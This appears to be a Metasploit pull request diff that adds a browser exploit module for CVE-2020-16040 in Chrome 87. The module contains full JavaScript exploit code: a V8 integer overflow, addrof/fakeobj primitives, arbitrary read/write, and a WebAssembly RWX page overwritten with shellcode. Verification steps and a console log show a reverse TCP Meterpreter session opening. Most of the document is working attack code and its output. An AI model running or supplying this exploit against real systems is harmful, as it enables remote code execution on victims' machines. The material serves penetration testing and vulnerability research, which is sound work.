+    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
   end
 
 end

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', {'Platform' => 'win'}],
           ['macOS - Google Chrome 87.0.4280.66 (64 bit)', {'Platform' => 'osx'}],
         ],
-      'DisclosureDate' => 'March 3 2021'))
+      'DisclosureDate' => '2021-03-03'))
   end
 
   def on_request_uri(cli, request)
@@ -146,7 +146,7 @@ var shellcode = [#{js_payload}];
 while(shellcode.length % 4)
     shellcode.push(0x90);
 for(i=0;i<shellcode.length;++i)
-	u8_buf[i] = shellcode[i];
+    u8_buf[i] = shellcode[i];
 copy_shellcode(rwx_page_addr, u32_buf);
 f();
 ^

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -1,0 +1,168 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',
+      'Description'    => %q{
+      This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).
+      The exploit makes use of a integer overflow in the SimplifiedLowering phase in turbofan.
+      It is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.
+      This is abused to gain arbitrary read/write into the isolate region.
+      Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.
+      The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
+      The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Rajvardhan Agarwal (r4j)', # exploit
+        ],
+      'References'     => [
+          ['CVE', '2020-16040'],
+          ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],
+          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],
+        ],
+      'Arch'           => [ ARCH_X64 ],
+      'DefaultTarget'  => 0,
+      'Targets'        =>
+        [
+          ['Linux - Google Chrome 87.0.4280.66 (64 bit)', {'Platform' => 'linux'}],
+          ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', {'Platform' => 'win'}],
+          ['macOS - Google Chrome 87.0.4280.66 (64 bit)', {'Platform' => 'osx'}],
+        ],
+      'DisclosureDate' => 'March 3 2021'))
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '').gsub(/\x0d/,'')
+    jscript = %Q^
+var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+var wasm_mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(wasm_mod);
+var f = wasm_instance.exports.main;
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+var sc = new ArrayBuffer(0x150);
+var u8_buf = new Uint8Array(sc);
+var u32_buf = new Uint32Array(sc);
+let buf2 = new ArrayBuffer(0x150);
+
+function ftoi(val) {
+    f64_buf[0] = val;
+    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+
+function itof(val) {
+    u64_buf[0] = Number(val & 0xffffffffn);
+    u64_buf[1] = Number(val >> 32n);
+    return f64_buf[0];
+}
+
+function foo(a) {
+  var y = 0x7fffffff;
+
+  if (a == NaN) y = NaN;
+  if (a) y = -1;
+
+  let z = y + 1;
+  z >>= 31;
+  z = 0x80000000 - Math.sign(z|1);
+
+  if(a) z = 0;
+
+  var arr = new Array(0-Math.sign(z));
+  arr.shift();
+  var cor = [1.1, 1.2, 1.3];
+
+  return [arr, cor];
+}
+
+for(var i=0;i<0x3000;++i)
+    foo(true);
+
+var x = foo(false);
+var arr = x[0];
+var cor = x[1];
+
+const idx = 6;
+arr[idx+10] = 0x4242;
+
+function addrof(k) {
+    arr[idx+1] = k;
+    return ftoi(cor[0]) & 0xffffffffn;
+}
+
+function fakeobj(k) {
+    cor[0] = itof(k);
+    return arr[idx+1];
+}
+
+var float_array_map = ftoi(cor[3]);
+
+var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+var fake = fakeobj(addrof(arr2) + 0x20n);
+
+function arbread(addr) {
+    if (addr % 2n == 0) {
+        addr += 1n;
+    }
+    arr2[1] = itof((2n << 32n) + addr - 8n);
+    return (fake[0]);
+}
+
+function arbwrite(addr, val) {
+    if (addr % 2n == 0) {
+        addr += 1n;
+    }
+    arr2[1] = itof((2n << 32n) + addr - 8n);
+    fake[0] = itof(BigInt(val));
+}
+
+function copy_shellcode(addr, shellcode) {
+    let dataview = new DataView(buf2);
+    let buf_addr = addrof(buf2);
+    let backing_store_addr = buf_addr + 0x14n;
+    arbwrite(backing_store_addr, addr);
+
+    for (let i = 0; i < shellcode.length; i++) {
+        dataview.setUint32(4*i, shellcode[i], true);
+    }
+}
+
+var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
+console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
+var shellcode = [#{js_payload}];
+while(shellcode.length % 4)
+    shellcode.push(0x90);
+for(i=0;i<shellcode.length;++i)
+	u8_buf[i] = shellcode[i];
+copy_shellcode(rwx_page_addr, u32_buf);
+f();
+^
+
+    html = %Q^
+<html>
+<head>
+<script>
+#{jscript}
+</script>
+</head>
+<body>
+</body>
+</html>
+    ^
+    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+  end
+
+end


### PR DESCRIPTION
## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/browser/chrome_simplifiedlowering_overflow`
- [ ] `set uripath /`
- [ ] `set srvhost 127.0.0.1`
- [ ] `set lhost 127.0.0.1`
- [ ]  `run`

e.g:  
```
msf5 > use exploit/multi/browser/chrome_simplifiedlowering_overflow
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvport 80
srvport => 80
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set uripath /
uripath => /
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
msf5 exploit(multi/browser/chrome) > [*] Using URL: http://127.0.0.1:80/
[*] Server started.
[*] 127.0.0.1        chrome_simplifiedlowering_overflow - Sending /index.html to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
[*] Sending stage (3012516 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:44046) at 2021-04-06 16:33:05 +0530

msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
```